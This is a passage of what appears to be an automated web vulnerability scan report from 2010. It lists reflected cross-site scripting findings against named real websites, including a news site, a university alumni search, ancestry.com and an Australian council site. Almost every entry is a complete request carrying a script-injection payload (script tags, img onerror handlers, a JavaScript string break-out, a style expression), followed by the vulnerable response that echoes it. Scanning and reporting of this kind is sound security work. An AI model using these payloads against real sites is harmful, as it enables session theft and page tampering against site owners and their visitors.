GET /top/regional-newseae31<img%20src%3da%20onerror%3dalert(1)>95cdeb24803 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:02 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=78f60eb0de1271983c72af4e604567de; expires=Wed, 12-Dec-2035 00:33:02 GMT; path=/ Content-Length: 76409 Connection: close Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e8b"><script>alert(1)</script>7f6f717667b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/science72e8b"><script>alert(1)</script>7f6f717667b HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:36 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=1ef546de21b5bb14645f77942590db53; expires=Wed, 12-Dec-2035 00:32:37 GMT; path=/ Content-Length: 15290 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/science72e8b"><script>alert(1)</script>7f6f717667b%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa2bb<img%20src%3da%20onerror%3dalert(1)>2cf92fd20cf was submitted in the REST URL parameter 2. This input was echoed as fa2bb<img src=a onerror=alert(1)>2cf92fd20cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/sciencefa2bb<img%20src%3da%20onerror%3dalert(1)>2cf92fd20cf HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:04 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=b143c3dd52a46dcd4340dce7c14e3796; expires=Wed, 12-Dec-2035 00:33:05 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76265
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d84d0<img%20src%3da%20onerror%3dalert(1)>b3994a8de5e was submitted in the REST URL parameter 2. This input was echoed as d84d0<img src=a onerror=alert(1)>b3994a8de5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/soccerd84d0<img%20src%3da%20onerror%3dalert(1)>b3994a8de5e HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:34:08 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=ef9d53ca54d23e750bf7e63d0e7cf5d1; expires=Wed, 12-Dec-2035 00:34:08 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76241
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c88b"><script>alert(1)</script>20d0cbe266b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/soccer4c88b"><script>alert(1)</script>20d0cbe266b HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:43 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=575c7304557adf6bcf5056c897593eb3; expires=Wed, 12-Dec-2035 00:33:44 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/soccer4c88b"><script>alert(1)</script>20d0cbe266b%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8e3c1<img%20src%3da%20onerror%3dalert(1)>fd90180113b was submitted in the REST URL parameter 2. This input was echoed as 8e3c1<img src=a onerror=alert(1)>fd90180113b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/sports8e3c1<img%20src%3da%20onerror%3dalert(1)>fd90180113b HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:18 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=8b3a0b559c49ac76f971d5929f872fab; expires=Wed, 12-Dec-2035 00:33:19 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76241
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69819"><script>alert(1)</script>e8996b4d089 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/sports69819"><script>alert(1)</script>e8996b4d089 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:53 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=b5437e28df1c1b8eec2552cfca4147b0; expires=Wed, 12-Dec-2035 00:32:54 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/sports69819"><script>alert(1)</script>e8996b4d089%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf8f9<img%20src%3da%20onerror%3dalert(1)>0dd420935b6 was submitted in the REST URL parameter 2. This input was echoed as bf8f9<img src=a onerror=alert(1)>0dd420935b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/stocksbf8f9<img%20src%3da%20onerror%3dalert(1)>0dd420935b6 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:01 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=16f8a07625fbf5301a7c9e8dd9ae74f7; expires=Wed, 12-Dec-2035 00:33:01 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76241
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d17c"><script>alert(1)</script>b11a9897760 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/stocks3d17c"><script>alert(1)</script>b11a9897760 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:36 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=f8d7b5dfe1350e3874199b41523179fb; expires=Wed, 12-Dec-2035 00:32:37 GMT; path=/ Content-Length: 15277 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/stocks3d17c"><script>alert(1)</script>b11a9897760%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9315c<img%20src%3da%20onerror%3dalert(1)>317e135e22e was submitted in the REST URL parameter 2. This input was echoed as 9315c<img src=a onerror=alert(1)>317e135e22e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/technology9315c<img%20src%3da%20onerror%3dalert(1)>317e135e22e HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:01 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=d9485efe5aab214847e580cbca3ce0f9; expires=Wed, 12-Dec-2035 00:33:02 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76337
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dc00"><script>alert(1)</script>5073fc1ed8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/technology5dc00"><script>alert(1)</script>5073fc1ed8 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:37 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=e403602586a0fa913264119a9e38ea6c; expires=Wed, 12-Dec-2035 00:32:38 GMT; path=/ Content-Length: 15321 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/technology5dc00"><script>alert(1)</script>5073fc1ed8%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 624c0<img%20src%3da%20onerror%3dalert(1)>d656336a4f7 was submitted in the REST URL parameter 2. This input was echoed as 624c0<img src=a onerror=alert(1)>d656336a4f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/tv624c0<img%20src%3da%20onerror%3dalert(1)>d656336a4f7 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:34:41 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=6549bd5803f7a9fccbf5fab6514d3d8a; expires=Wed, 12-Dec-2035 00:34:42 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76145
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c812"><script>alert(1)</script>cb17deebd63 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/tv8c812"><script>alert(1)</script>cb17deebd63 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:34:13 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=fef7ef05b344cee33eb4d265468d85f2; expires=Wed, 12-Dec-2035 00:34:13 GMT; path=/ Content-Length: 15225 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/tv8c812"><script>alert(1)</script>cb17deebd63%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6330"><script>alert(1)</script>3327836ed19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/world-newsa6330"><script>alert(1)</script>3327836ed19 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:37 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=44f707dd424875adbdc5fe37eaf50dfe; expires=Wed, 12-Dec-2035 00:32:37 GMT; path=/ Content-Length: 15329 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/world-newsa6330"><script>alert(1)</script>3327836ed19%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69f36<img%20src%3da%20onerror%3dalert(1)>041a23ee282 was submitted in the REST URL parameter 2. This input was echoed as 69f36<img src=a onerror=alert(1)>041a23ee282 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/world-news69f36<img%20src%3da%20onerror%3dalert(1)>041a23ee282 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:03 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=b09ee82c8db9984a2e68b89eb09cd729; expires=Wed, 12-Dec-2035 00:33:05 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76337
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 class="headline">Top World News69f36<img Src=a Onerror=alert(1)>041a23ee282 Blogs </h1> ...[SNIP]...
The value of the eventid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 839e3'%3balert(1)//d3646eb9450 was submitted in the eventid parameter. This input was echoed as 839e3';alert(1)//d3646eb9450 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/pmny001/viewer/index.jsp?eventid=34996839e3'%3balert(1)//d3646eb9450&adid=gcs_website HTTP/1.1 Host: video.webcasts.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:36:12 GMT Server: Apache/1.3.41 (Unix) mod_jk/1.2.26 mod_gzip/1.3.26.1a mod_ssl/2.8.31 OpenSSL/0.9.8e Vary: Accept-Encoding Set-Cookie: JSESSIONID=6816DE2CF65C0B298B29F9821D80EF00; Path=/ Content-Length: 344 Connection: close Content-Type: text/html;charset=utf-8
2.317. http://www.alumni.uga.edu/alumni/phpsearch/search.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.alumni.uga.edu
Path: /alumni/phpsearch/search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c1a7"><script>alert(1)</script>e5bc102f42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alumni/phpsearch/search.php/7c1a7"><script>alert(1)</script>e5bc102f42 HTTP/1.1 Host: www.alumni.uga.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:40:14 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.4-2ubuntu5.10 Connection: close Content-Type: text/html; charset=windows-1252 Content-Length: 15038
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- This is the search template file (search_template.html) which con ...[SNIP]... <form method="get" action="/alumni/phpsearch/search.php/7c1a7"><script>alert(1)</script>e5bc102f42" class="zoom_searchform"> ...[SNIP]...
The value of the rt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c239b"style%3d"x%3aexpression(alert(1))"d77fd4d7f9d was submitted in the rt parameter. This input was echoed as c239b"style="x:expression(alert(1))"d77fd4d7f9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /search/rectype/default.aspx?rt=34/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dHrUDTavZK8SAlAej_KjFCQ\\x26amp;ved\\x3d0CE4Q6QUoAQ\\x26amp;q\\x3daspx+search+index\\x26amp;usg\\x3dAFQjCNFjK5ECYLcXMDBPeLrcEjoDeo01qA\\x22\\x3eBirth,c239b"style%3d"x%3aexpression(alert(1))"d77fd4d7f9d HTTP/1.1 Host: www.ancestry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: VARSESSION=S=BXWDg%2ftsz06iWV%2beg6PXLw%3d%3d&SLI=0&FIRSTSESSION=1&ITT=0&FSR.LC=1; domain=.ancestry.com; path=/ Set-Cookie: ANCUUID=ZAK0-_pUoIkpz4qedOWUC; domain=.ancestry.com; expires=Wed, 11-Dec-2030 18:39:44 GMT; path=/ Set-Cookie: ATT=0; domain=.ancestry.com; path=/ Set-Cookie: ANCATT=0; domain=.ancestry.com; path=/ Set-Cookie: SAC=; domain=.ancestry.com; expires=Tue, 11-Dec-1990 18:39:44 GMT; path=/ Set-Cookie: RMEATT=; domain=.ancestry.com; expires=Tue, 11-Dec-1990 18:39:44 GMT; path=/ Set-Cookie: VARS=MS=2; domain=.ancestry.com; expires=Wed, 11-Dec-2030 18:39:44 GMT; path=/ Set-Cookie: OMNITURET=MR=1033; domain=.ancestry.com; path=/ P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI NAV INT PRE" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:39:47 GMT Connection: close Content-Length: 4888154 Vary: Accept-Encoding, User-Agent
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Search All Catego ...[SNIP]... 34/x26amp;rct\\x3dj\\x26amp;sa\\x3dx\\x26amp;ei\\x3dhrudtavzk8salaej_kjfcq\\x26amp;ved\\x3d0ce4q6quoaq\\x26amp;q\\x3daspx search index\\x26amp;usg\\x3dafqjcnfjk5ecylcxmdbpelrcejodeo01qa\\x22\\x3ebirth,c239b"style="x:expression(alert(1))"d77fd4d7f9d&lcid=1033&css=default&ti=0&ti.si=0&cs=http%3a%2f%2fc.mfcreative.com&ss=search.ancestry.com&gss=&view=advanced"> ...[SNIP]...
2.319. http://www.casey.vic.gov.au/search/search.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.casey.vic.gov.au
Path: /search/search.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f33b4--><script>alert(1)</script>2a2aa3f91db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /search/search.asp?f33b4--><script>alert(1)</script>2a2aa3f91db=1 HTTP/1.1 Host: www.casey.vic.gov.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 17:48:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 52853 Content-Type: text/html; Charset=iso-8859-1 Set-Cookie: cookieChecker=true; path=/ Set-Cookie: ASPSESSIONIDAAABSDTB=MFOODDMBBEJMFKINHKBJFFFB; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a onClick="javascript:pageTracker._trackPageview ('Switch to m.casey.vic.gov.au');" href="http://www.casey.vic.gov.au/search/search.asp?f33b4--><script>alert(1)</script>2a2aa3f91db=1&mobile=on"> ...[SNIP]...
2.320. http://www.casey.vic.gov.au/search/search.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.casey.vic.gov.au
Path: /search/search.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d70cc"><script>alert(1)</script>4f5fa439031 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/search.asp?d70cc"><script>alert(1)</script>4f5fa439031=1 HTTP/1.1 Host: www.casey.vic.gov.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
